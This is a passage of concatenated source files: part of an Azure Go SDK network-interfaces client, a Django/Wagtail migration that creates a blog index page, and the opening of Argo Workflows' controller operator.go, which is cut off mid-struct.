"networkInterfaceName": autorest.Encode("path", networkInterfaceName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsDelete(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{Cancel: cancel})
}
// DeleteSender sends the Delete request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) DeleteSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client,
req,
azure.DoPollForAsynchronous(client.PollingDelay))
}
// DeleteResponder handles the response to the Delete request. The method always
// closes the http.Response Body.
func (client InterfacesClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusNoContent, http.StatusAccepted, http.StatusOK),
autorest.ByClosing())
result.Response = resp
return
}
// Get the Get network interface operation retrieves information about the
// specified network interface.
//
// resourceGroupName is the name of the resource group. networkInterfaceName
// is the name of the network interface. expand is expand references
// resources.
func (client InterfacesClient) Get(resourceGroupName string, networkInterfaceName string, expand string) (result Interface, err error) {
req, err := client.GetPreparer(resourceGroupName, networkInterfaceName, expand)
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "Get", nil, "Failure preparing request")
}
resp, err := client.GetSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "Get", resp, "Failure sending request")
}
result, err = client.GetResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "Get", resp, "Failure responding to request")
}
return
}
// GetPreparer prepares the Get request.
func (client InterfacesClient) GetPreparer(resourceGroupName string, networkInterfaceName string, expand string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"networkInterfaceName": autorest.Encode("path", networkInterfaceName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
if len(expand) > 0 {
queryParameters["$expand"] = autorest.Encode("query", expand)
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{})
}
// GetSender sends the Get request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) GetSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client, req)
}
// GetResponder handles the response to the Get request. The method always
// closes the http.Response Body.
func (client InterfacesClient) GetResponder(resp *http.Response) (result Interface, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// GetEffectiveRouteTable the get effective route table operation retrieves all
// the route tables applied on a networkInterface. This method may poll for
// completion. Polling can be canceled by passing the cancel channel
// argument. The channel will be used to cancel polling and any outstanding
// HTTP requests.
//
// resourceGroupName is the name of the resource group. networkInterfaceName
// is the name of the network interface.
func (client InterfacesClient) GetEffectiveRouteTable(resourceGroupName string, networkInterfaceName string, cancel <-chan struct{}) (result autorest.Response, err error) {
req, err := client.GetEffectiveRouteTablePreparer(resourceGroupName, networkInterfaceName, cancel)
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "GetEffectiveRouteTable", nil, "Failure preparing request")
}
resp, err := client.GetEffectiveRouteTableSender(req)
if err != nil {
result.Response = resp
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "GetEffectiveRouteTable", resp, "Failure sending request")
}
result, err = client.GetEffectiveRouteTableResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "GetEffectiveRouteTable", resp, "Failure responding to request")
}
return
}
// GetEffectiveRouteTablePreparer prepares the GetEffectiveRouteTable request.
func (client InterfacesClient) GetEffectiveRouteTablePreparer(resourceGroupName string, networkInterfaceName string, cancel <-chan struct{}) (*http.Request, error) {
pathParameters := map[string]interface{}{
"networkInterfaceName": autorest.Encode("path", networkInterfaceName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsPost(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{Cancel: cancel})
}
// GetEffectiveRouteTableSender sends the GetEffectiveRouteTable request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) GetEffectiveRouteTableSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client,
req,
azure.DoPollForAsynchronous(client.PollingDelay))
}
// GetEffectiveRouteTableResponder handles the response to the GetEffectiveRouteTable request. The method always
// closes the http.Response Body.
func (client InterfacesClient) GetEffectiveRouteTableResponder(resp *http.Response) (result autorest.Response, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusAccepted),
autorest.ByClosing())
result.Response = resp
return
}
// GetVirtualMachineScaleSetNetworkInterface the Get network interface
// operation retrieves information about the specified network interface in a
// virtual machine scale set.
//
// resourceGroupName is the name of the resource group.
// virtualMachineScaleSetName is the name of the virtual machine scale set.
// virtualmachineIndex is the virtual machine index. networkInterfaceName is
// the name of the network interface. expand is expand references resources.
func (client InterfacesClient) GetVirtualMachineScaleSetNetworkInterface(resourceGroupName string, virtualMachineScaleSetName string, virtualmachineIndex string, networkInterfaceName string, expand string) (result Interface, err error) {
req, err := client.GetVirtualMachineScaleSetNetworkInterfacePreparer(resourceGroupName, virtualMachineScaleSetName, virtualmachineIndex, networkInterfaceName, expand)
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "GetVirtualMachineScaleSetNetworkInterface", nil, "Failure preparing request")
}
resp, err := client.GetVirtualMachineScaleSetNetworkInterfaceSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "GetVirtualMachineScaleSetNetworkInterface", resp, "Failure sending request")
}
result, err = client.GetVirtualMachineScaleSetNetworkInterfaceResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "GetVirtualMachineScaleSetNetworkInterface", resp, "Failure responding to request")
}
return
}
// GetVirtualMachineScaleSetNetworkInterfacePreparer prepares the GetVirtualMachineScaleSetNetworkInterface request.
func (client InterfacesClient) GetVirtualMachineScaleSetNetworkInterfacePreparer(resourceGroupName string, virtualMachineScaleSetName string, virtualmachineIndex string, networkInterfaceName string, expand string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"networkInterfaceName": autorest.Encode("path", networkInterfaceName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
"virtualmachineIndex": autorest.Encode("path", virtualmachineIndex),
"virtualMachineScaleSetName": autorest.Encode("path", virtualMachineScaleSetName),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
if len(expand) > 0 {
queryParameters["$expand"] = autorest.Encode("query", expand)
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{})
}
// GetVirtualMachineScaleSetNetworkInterfaceSender sends the GetVirtualMachineScaleSetNetworkInterface request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) GetVirtualMachineScaleSetNetworkInterfaceSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client, req)
}
// GetVirtualMachineScaleSetNetworkInterfaceResponder handles the response to the GetVirtualMachineScaleSetNetworkInterface request. The method always
// closes the http.Response Body.
func (client InterfacesClient) GetVirtualMachineScaleSetNetworkInterfaceResponder(resp *http.Response) (result Interface, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// List the List networkInterfaces operation retrieves all the
// networkInterfaces in a resource group.
//
// resourceGroupName is the name of the resource group.
func (client InterfacesClient) List(resourceGroupName string) (result InterfaceListResult, err error) {
req, err := client.ListPreparer(resourceGroupName)
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "List", nil, "Failure preparing request")
}
resp, err := client.ListSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "List", resp, "Failure sending request")
}
result, err = client.ListResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "List", resp, "Failure responding to request")
}
return
}
// ListPreparer prepares the List request.
func (client InterfacesClient) ListPreparer(resourceGroupName string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{})
}
// ListSender sends the List request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) ListSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client, req)
}
// ListResponder handles the response to the List request. The method always
// closes the http.Response Body.
func (client InterfacesClient) ListResponder(resp *http.Response) (result InterfaceListResult, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// ListNextResults retrieves the next set of results, if any.
func (client InterfacesClient) ListNextResults(lastResults InterfaceListResult) (result InterfaceListResult, err error) {
req, err := lastResults.InterfaceListResultPreparer()
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "List", nil, "Failure preparing next results request")
}
if req == nil {
return
}
resp, err := client.ListSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "List", resp, "Failure sending next results request")
}
result, err = client.ListResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "List", resp, "Failure responding to next results request")
}
return
}
// ListAll the List networkInterfaces operation retrieves all the
// networkInterfaces in a subscription.
func (client InterfacesClient) ListAll() (result InterfaceListResult, err error) {
req, err := client.ListAllPreparer()
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListAll", nil, "Failure preparing request")
}
resp, err := client.ListAllSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListAll", resp, "Failure sending request")
}
result, err = client.ListAllResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "ListAll", resp, "Failure responding to request")
}
return
}
// ListAllPreparer prepares the ListAll request.
func (client InterfacesClient) ListAllPreparer() (*http.Request, error) {
pathParameters := map[string]interface{}{
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/providers/Microsoft.Network/networkInterfaces", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{})
}
// ListAllSender sends the ListAll request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) ListAllSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client, req)
}
// ListAllResponder handles the response to the ListAll request. The method always
// closes the http.Response Body.
func (client InterfacesClient) ListAllResponder(resp *http.Response) (result InterfaceListResult, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// ListAllNextResults retrieves the next set of results, if any.
func (client InterfacesClient) ListAllNextResults(lastResults InterfaceListResult) (result InterfaceListResult, err error) {
req, err := lastResults.InterfaceListResultPreparer()
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListAll", nil, "Failure preparing next results request")
}
if req == nil {
return
}
resp, err := client.ListAllSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListAll", resp, "Failure sending next results request")
}
result, err = client.ListAllResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "ListAll", resp, "Failure responding to next results request")
}
return
}
// ListEffectiveNetworkSecurityGroups the list effective network security
// group operation retrieves all the network security groups applied on a
// networkInterface. This method may poll for completion. Polling can be
// canceled by passing the cancel channel argument. The channel will be used
// to cancel polling and any outstanding HTTP requests.
//
// resourceGroupName is the name of the resource group. networkInterfaceName
// is the name of the network interface.
func (client InterfacesClient) ListEffectiveNetworkSecurityGroups(resourceGroupName string, networkInterfaceName string, cancel <-chan struct{}) (result autorest.Response, err error) {
req, err := client.ListEffectiveNetworkSecurityGroupsPreparer(resourceGroupName, networkInterfaceName, cancel)
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListEffectiveNetworkSecurityGroups", nil, "Failure preparing request")
}
resp, err := client.ListEffectiveNetworkSecurityGroupsSender(req)
if err != nil {
result.Response = resp
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListEffectiveNetworkSecurityGroups", resp, "Failure sending request")
}
result, err = client.ListEffectiveNetworkSecurityGroupsResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "ListEffectiveNetworkSecurityGroups", resp, "Failure responding to request")
}
return
}
// ListEffectiveNetworkSecurityGroupsPreparer prepares the ListEffectiveNetworkSecurityGroups request.
func (client InterfacesClient) ListEffectiveNetworkSecurityGroupsPreparer(resourceGroupName string, networkInterfaceName string, cancel <-chan struct{}) (*http.Request, error) {
pathParameters := map[string]interface{}{
"networkInterfaceName": autorest.Encode("path", networkInterfaceName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsPost(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{Cancel: cancel})
}
// ListEffectiveNetworkSecurityGroupsSender sends the ListEffectiveNetworkSecurityGroups request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) ListEffectiveNetworkSecurityGroupsSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client,
req,
azure.DoPollForAsynchronous(client.PollingDelay))
}
// ListEffectiveNetworkSecurityGroupsResponder handles the response to the ListEffectiveNetworkSecurityGroups request. The method always
// closes the http.Response Body.
func (client InterfacesClient) ListEffectiveNetworkSecurityGroupsResponder(resp *http.Response) (result autorest.Response, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusAccepted),
autorest.ByClosing())
result.Response = resp
return
}
// ListVirtualMachineScaleSetNetworkInterfaces the list network interface
// operation retrieves information about all network interfaces in a virtual
// machine scale set.
//
// resourceGroupName is the name of the resource group.
// virtualMachineScaleSetName is the name of the virtual machine scale set.
func (client InterfacesClient) ListVirtualMachineScaleSetNetworkInterfaces(resourceGroupName string, virtualMachineScaleSetName string) (result InterfaceListResult, err error) {
req, err := client.ListVirtualMachineScaleSetNetworkInterfacesPreparer(resourceGroupName, virtualMachineScaleSetName)
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetNetworkInterfaces", nil, "Failure preparing request")
}
resp, err := client.ListVirtualMachineScaleSetNetworkInterfacesSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetNetworkInterfaces", resp, "Failure sending request")
}
result, err = client.ListVirtualMachineScaleSetNetworkInterfacesResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetNetworkInterfaces", resp, "Failure responding to request")
}
return
}
// ListVirtualMachineScaleSetNetworkInterfacesPreparer prepares the ListVirtualMachineScaleSetNetworkInterfaces request.
func (client InterfacesClient) ListVirtualMachineScaleSetNetworkInterfacesPreparer(resourceGroupName string, virtualMachineScaleSetName string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
"virtualMachineScaleSetName": autorest.Encode("path", virtualMachineScaleSetName),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/networkInterfaces", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{})
}
// ListVirtualMachineScaleSetNetworkInterfacesSender sends the ListVirtualMachineScaleSetNetworkInterfaces request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) ListVirtualMachineScaleSetNetworkInterfacesSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client, req)
}
// ListVirtualMachineScaleSetNetworkInterfacesResponder handles the response to the ListVirtualMachineScaleSetNetworkInterfaces request. The method always
// closes the http.Response Body.
func (client InterfacesClient) ListVirtualMachineScaleSetNetworkInterfacesResponder(resp *http.Response) (result InterfaceListResult, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// ListVirtualMachineScaleSetNetworkInterfacesNextResults retrieves the next set of results, if any.
func (client InterfacesClient) ListVirtualMachineScaleSetNetworkInterfacesNextResults(lastResults InterfaceListResult) (result InterfaceListResult, err error) {
req, err := lastResults.InterfaceListResultPreparer()
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetNetworkInterfaces", nil, "Failure preparing next results request")
}
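// InterfaceListResultPreparer returns a nil request when the previous page has no NextLink,
// i.e. there are no further pages to fetch.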
if req == nil {
return
}
resp, err := client.ListVirtualMachineScaleSetNetworkInterfacesSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetNetworkInterfaces", resp, "Failure sending next results request")
}
result, err = client.ListVirtualMachineScaleSetNetworkInterfacesResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetNetworkInterfaces", resp, "Failure responding to next results request")
}
return
}
// ListVirtualMachineScaleSetVMNetworkInterfaces retrieves information about all
// network interfaces in a virtual machine belonging to a virtual machine scale set.
//
// resourceGroupName is the name of the resource group.
// virtualMachineScaleSetName is the name of the virtual machine scale set.
// virtualmachineIndex is the virtual machine index.
func (client InterfacesClient) ListVirtualMachineScaleSetVMNetworkInterfaces(resourceGroupName string, virtualMachineScaleSetName string, virtualmachineIndex string) (result InterfaceListResult, err error) {
req, err := client.ListVirtualMachineScaleSetVMNetworkInterfacesPreparer(resourceGroupName, virtualMachineScaleSetName, virtualmachineIndex)
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetVMNetworkInterfaces", nil, "Failure preparing request")
}
resp, err := client.ListVirtualMachineScaleSetVMNetworkInterfacesSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetVMNetworkInterfaces", resp, "Failure sending request")
}
result, err = client.ListVirtualMachineScaleSetVMNetworkInterfacesResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetVMNetworkInterfaces", resp, "Failure responding to request")
}
return
}
// ListVirtualMachineScaleSetVMNetworkInterfacesPreparer prepares the ListVirtualMachineScaleSetVMNetworkInterfaces request.
func (client InterfacesClient) ListVirtualMachineScaleSetVMNetworkInterfacesPreparer(resourceGroupName string, virtualMachineScaleSetName string, virtualmachineIndex string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
"virtualmachineIndex": autorest.Encode("path", virtualmachineIndex),
"virtualMachineScaleSetName": autorest.Encode("path", virtualMachineScaleSetName),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{})
}
// ListVirtualMachineScaleSetVMNetworkInterfacesSender sends the ListVirtualMachineScaleSetVMNetworkInterfaces request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) ListVirtualMachineScaleSetVMNetworkInterfacesSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client, req)
}
// ListVirtualMachineScaleSetVMNetworkInterfacesResponder handles the response to the ListVirtualMachineScaleSetVMNetworkInterfaces request. The method always
// closes the http.Response Body.
func (client InterfacesClient) ListVirtualMachineScaleSetVMNetworkInterfacesResponder(resp *http.Response) (result InterfaceListResult, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// ListVirtualMachineScaleSetVMNetworkInterfacesNextResults retrieves the next set of results, if any.
func (client InterfacesClient) ListVirtualMachineScaleSetVMNetworkInterfacesNextResults(lastResults InterfaceListResult) (result InterfaceListResult, err error) {
req, err := lastResults.InterfaceListResultPreparer()
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetVMNetworkInterfaces", nil, "Failure preparing next results request")
}
if req == nil {
return
}
resp, err := client.ListVirtualMachineScaleSetVMNetworkInterfacesSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetVMNetworkInterfaces", resp, "Failure sending next results request")
}
result, err = client.ListVirtualMachineScaleSetVMNetworkInterfacesResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetVMNetworkInterfaces", resp, "Failure responding to next results request")
}
return
}
libraries/blog/migrations/0003_create_blogindex.py
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-18 00:36
from __future__ import unicode_literals
from django.db import migrations
from wagtail.core.models import Page
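# Note: Page is imported directly (rather than fetched via apps.get_model), presumably so that
# add_child() below can use treebeard's tree-management methods, which historical migration
# models do not provide.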
def create_blogindex(apps, schema_editor):
# Get models
ContentType = apps.get_model('contenttypes.ContentType')
BlogIndex = apps.get_model('blog.BlogIndex')
# Delete any existing blogindex
# Protects if migration is run multiple times
BlogIndex.objects.filter(slug='blog', depth=3).delete()
# Get content type for blogindex model
blogindex_content_type, __ = ContentType.objects.get_or_create(
model='blogindex', app_label='blog')
home_page = Page.objects.get(slug='home')
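# Assumes the standard Wagtail page tree: root (depth 1) -> home page (depth 2) -> blog index
# (depth 3), which is why depth=3 and url_path='/home/blog/' are used below.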
blogindex = BlogIndex(
title="CCA Libraries Blog",
draft_title="CCA Libraries Blog",
slug='blog',
content_type=blogindex_content_type,
depth=3,
url_path='/home/blog/'
)
# Create a new blogindex as child of home page
home_page.add_child(instance=blogindex)
def remove_blogindex(apps, schema_editor):
# Get models
# ContentType = apps.get_model('contenttypes.ContentType')
BlogIndex = apps.get_model('blog.BlogIndex')
# Delete the default blogindex
# Page and Site objects CASCADE
BlogIndex.objects.filter(slug='blog', depth=3).delete()
# Delete content type for the blogindex model
# NOTE: I don't _think_ we need to delete the blogindex content type
# I based this migration off of 0002_create_homepage.py
# ContentType.objects.filter(model='blogindex', app_label='blog').delete()
class Migration(migrations.Migration):
# we need the blogindex model to already exist
dependencies = [
('blog', '0002_blogindex'),
('home', '0002_create_homepage'),
('wagtailcore', '0040_page_draft_title'),
('wagtailcore', '0043_lock_fields'),
]
operations = [
migrations.RunPython(create_blogindex, remove_blogindex),
]
workflow/controller/operator.go
package controller
import (
"context"
"encoding/json"
"fmt"
"math"
"os"
"reflect"
"regexp"
"runtime/debug"
"sort"
"strconv"
"strings"
"sync"
"time"
"github.com/argoproj/pkg/humanize"
argokubeerr "github.com/argoproj/pkg/kube/errors"
"github.com/argoproj/pkg/strftime"
jsonpatch "github.com/evanphx/json-patch"
log "github.com/sirupsen/logrus"
apiv1 "k8s.io/api/core/v1"
policyv1beta "k8s.io/api/policy/v1beta1"
apierr "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"k8s.io/apimachinery/pkg/labels"
"k8s.io/apimachinery/pkg/util/strategicpatch"
"k8s.io/client-go/tools/cache"
"k8s.io/client-go/tools/record"
"k8s.io/utils/pointer"
"sigs.k8s.io/yaml"
"github.com/argoproj/argo-workflows/v3/config"
"github.com/argoproj/argo-workflows/v3/errors"
"github.com/argoproj/argo-workflows/v3/pkg/apis/workflow"
wfv1 "github.com/argoproj/argo-workflows/v3/pkg/apis/workflow/v1alpha1"
"github.com/argoproj/argo-workflows/v3/pkg/client/clientset/versioned/typed/workflow/v1alpha1"
"github.com/argoproj/argo-workflows/v3/util"
"github.com/argoproj/argo-workflows/v3/util/diff"
envutil "github.com/argoproj/argo-workflows/v3/util/env"
errorsutil "github.com/argoproj/argo-workflows/v3/util/errors"
"github.com/argoproj/argo-workflows/v3/util/intstr"
"github.com/argoproj/argo-workflows/v3/util/resource"
"github.com/argoproj/argo-workflows/v3/util/retry"
"github.com/argoproj/argo-workflows/v3/util/template"
waitutil "github.com/argoproj/argo-workflows/v3/util/wait"
"github.com/argoproj/argo-workflows/v3/workflow/common"
controllercache "github.com/argoproj/argo-workflows/v3/workflow/controller/cache"
"github.com/argoproj/argo-workflows/v3/workflow/controller/estimation"
"github.com/argoproj/argo-workflows/v3/workflow/controller/indexes"
"github.com/argoproj/argo-workflows/v3/workflow/metrics"
"github.com/argoproj/argo-workflows/v3/workflow/progress"
argosync "github.com/argoproj/argo-workflows/v3/workflow/sync"
"github.com/argoproj/argo-workflows/v3/workflow/templateresolution"
wfutil "github.com/argoproj/argo-workflows/v3/workflow/util"
"github.com/argoproj/argo-workflows/v3/workflow/validate"
)
// wfOperationCtx is the context for evaluation and operation of a single workflow
type wfOperationCtx struct {
// wf is the workflow object. It should not be used in execution logic; woc.execWf.Spec should be used instead
wf *wfv1.Workflow
// orig is the original workflow object for purposes of creating a patch
orig *wfv1.Workflow
// updated indicates whether or not the workflow object itself was updated
// and needs to be persisted back to kubernetes
updated bool
// log is a logrus logging context used to correlate logs with a workflow
log *log.Entry
// controller reference to workflow controller
controller *WorkflowController
// estimate duration
estimator estimation.Estimator
// globalParams holds any parameters that are available to be referenced
// in the global scope (e.g. workflow.parameters.XXX).
globalParams common.Parameters
// volumes holds a DeepCopy of wf.Spec.Volumes to perform substitutions.
// It is then used in addVolumeReferences() when creating a pod.
volumes []apiv1.Volume
// ArtifactRepository contains the default location of an artifact repository for container artifacts
artifactRepository *config.ArtifactRepository
// map of completed pods with their corresponding phases
completedPods map[string]apiv1.PodPhase
// deadline is the deadline by which this operation should relinquish
// its hold on the workflow so that an operation does not run for too long
// and starve other workqueue items. It also enables workflow progress to
// be periodically synced to the database.
deadline time.Time
// activePods tracks the number of active (Running/Pending) pods for controlling
